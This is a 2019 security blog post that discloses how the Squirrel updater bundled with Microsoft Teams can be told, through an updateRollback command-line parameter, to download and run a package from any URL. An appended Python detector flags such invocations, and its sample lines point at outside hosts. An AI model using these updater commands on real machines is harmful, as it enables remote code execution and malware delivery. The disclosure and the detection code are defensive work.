Tuesday, July 2, 2019

Update: NuGet/Squirrel uncontrolled endpoints lead to arbitrary code execution

Part 1: http://www.hexed.in/2019/06/nugetsquirrel-uncontrolled-endpoints.html

I found another vulnerable parameter with which Microsoft Teams remotely downloads and executes a payload.

Vulnerable parameter:
%localappdata%/Microsoft/Teams/update.exe --updateRollback=[URL to package]
%localappdata%/Microsoft/Teams/current/squirrel.exe --updateRollback=[URL to package]

Note: This affects a wide range of software packaged with Squirrel. Hopefully Microsoft Teams will be fixed as soon as possible.
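
A defender-side check for the parameter above, as an added example that is not from the original post: it scans process-creation command lines (for example, exported from endpoint logging) for the two Squirrel binaries invoked with updateRollback and a URL whose host is not on an allowlist. The allowlist host, the sample command lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Squirrel binaries named on this page, matched by file name.
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
# Assumption: hosts your Squirrel-packaged apps are expected to update from.
TRUSTED_UPDATE_HOSTS = {"updates.example.internal"}

# First token of the command line (the image path), quoted or bare.
EXE_RE = re.compile(r'\s*(?:"([^"]+)"|(\S+))')
# The flag is matched loosely (prefix, separator and case variants) so that
# spelling differences do not slip past; which variants the option parser
# really accepts is an assumption.
FLAG_RE = re.compile(r'(?:--?|/)updateRollback[=:\s]\s*("[^"]*"|\S+)', re.I)

def check_command_line(cmdline):
    """Return a finding dict for a Squirrel rollback from an unlisted URL, else None."""
    exe = EXE_RE.match(cmdline)
    if not exe:
        return None
    image = exe.group(1) or exe.group(2)
    if re.split(r"[\\/]", image)[-1].lower() not in SQUIRREL_BINARIES:
        return None
    flag = FLAG_RE.search(cmdline)
    if not flag:
        return None
    source = flag.group(1).strip('"')
    parsed = urlparse(source)
    if parsed.scheme.lower() not in ("http", "https"):
        return None  # local path: outside what this check covers
    host = (parsed.hostname or "").lower()
    if host in TRUSTED_UPDATE_HOSTS:
        return None
    return {"image": image, "source": source, "host": host}

def scan(events):
    """Run the check over an iterable of command lines; return the findings."""
    return [f for f in map(check_command_line, events) if f]

# Constructed sample command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --updateRollback=https://files.example.net/pkg/',
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Squirrel.exe" --updateRollback=https://updates.example.internal/teams/',
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'C:\Windows\System32\notepad.exe --updateRollback=https://files.example.net/pkg/',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT", finding)
```

Only the first sample line is reported: the second uses an allowlisted host, the third has no rollback flag, and the fourth is not a Squirrel binary.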

